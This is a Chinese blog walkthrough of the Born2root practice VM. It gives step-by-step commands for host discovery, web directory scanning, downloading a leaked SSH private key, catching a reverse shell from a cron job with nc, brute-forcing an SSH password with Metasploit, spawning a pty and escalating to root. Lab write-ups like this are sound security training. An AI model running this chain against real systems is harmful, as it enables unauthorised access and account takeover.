Born2root-SSH服务渗透

准备工作

  1. 先下载Born2root镜像并导入虚拟机,注意:本人将ova导入vmware时报了这个错误:
    在这里插入图片描述
  • 原因是OVFtools不兼容的问题,导入virtualbox解决问题!
    在这里插入图片描述

2.安装好kali攻击机,这个自行官网下载,这里不再赘述。

漏洞复现过程

  1. 使用netdiscover命令发现存活主机。
netdiscover -i eth0

发现目标主机

  • 发现目标主机,开始展开攻击!
  1. 首先使用nmap对目标主机进行信息收集。
nmap -sV 192.168.101.31

在这里插入图片描述

  • 发现目标主机开放了ssh端口和一些网络服务。有可能存在ssh私钥泄露等问题,进一步进行渗透。
  1. 使用浏览器登录,进一步进行信息收集。
    在这里插入图片描述
  • 发现了一些有用的信息,可能是目标主机的一个账户。
  1. 使用dirb工具进行WEB目录扫描,更加深入地进行信息挖掘。
dirb http://192.168.101.31/

在这里插入图片描述

  • 发掘到一些目录信息,并尝试能不能从中找到flag信息。

  • 首先先查找robots.txt文件,但是并没有发现有价值的信息。
    在这里插入图片描述

  • 最后打开http://192.168.101.31/icons/,发现出现了目录遍历。
    在这里插入图片描述

  • 打开VDSoyuAXiO.txt文件,发现了ssh的私钥加密信息。
    在这里插入图片描述

  1. 在命令行使用wget命令将这文件下载到桌面,并重命名为id_rsa。
wget http://192.168.101.31/icons/VDSoyuAXiO.txt

在这里插入图片描述

  1. 将id_rsa权限更改为600
chmod 600 id_rsa
  1. 然后使用该私钥尝试登陆目标系统。
ssh -i id_rsa martin@192.168.101.31

在这里插入图片描述

  • 成功登陆目标系统,但是发现martin账户并不属于root用户组,无法提权。

  • 然后再进一步查看/etc/passwd目录,收集账户信息。
    在这里插入图片描述

  • 进入home目录后发现共有三个用户,可能可以提权。

  • 再查看/etc/crontab上系统执行的周期性任务。发现jimmy账户每隔五分钟执行一遍sekurity.py文件。因此可以尝试编写py脚本反弹shell。
    在这里插入图片描述

  • 赋予脚本文件可执行的权限
    在这里插入图片描述

  1. 使用nc侦听端口,并反弹shell
nc -lvp 4444

在这里插入图片描述

  • 发现jimmy用户也不属于root用户组,提权失败。最后剩下hadi账户。
  1. hadi账户只能通过ssh口令暴力破解获取其登录密钥。
    在网上搜猜密码,并生成一个hadi.txt密码字典,保存在桌面即可。我使用过cupp生成,但是并不能成功破解,读者可以自行选择。

  2. 启动msfconsole,并加载相应模块进行漏洞利用。

msfconsole
use auxiliary/scanner/ssh/ssh_login
set rhosts 192.168.101.31
set username hadi
set pass_file /root/Desktop/hadi.txt
set threads 5
set verbose true
run
  • 等待一段时间发现密码是hadi123。尝试登陆
sessions -i 1
  • 在空白处键入该命令,获取shell字符页面
python -c "import pty; pty.spawn('/bin/bash')"
  1. 尝试提权,密码为hadi123
su - root
  • 提权成功
    在这里插入图片描述
  1. 查看flag在这里插入图片描述
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

平凡的学者

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值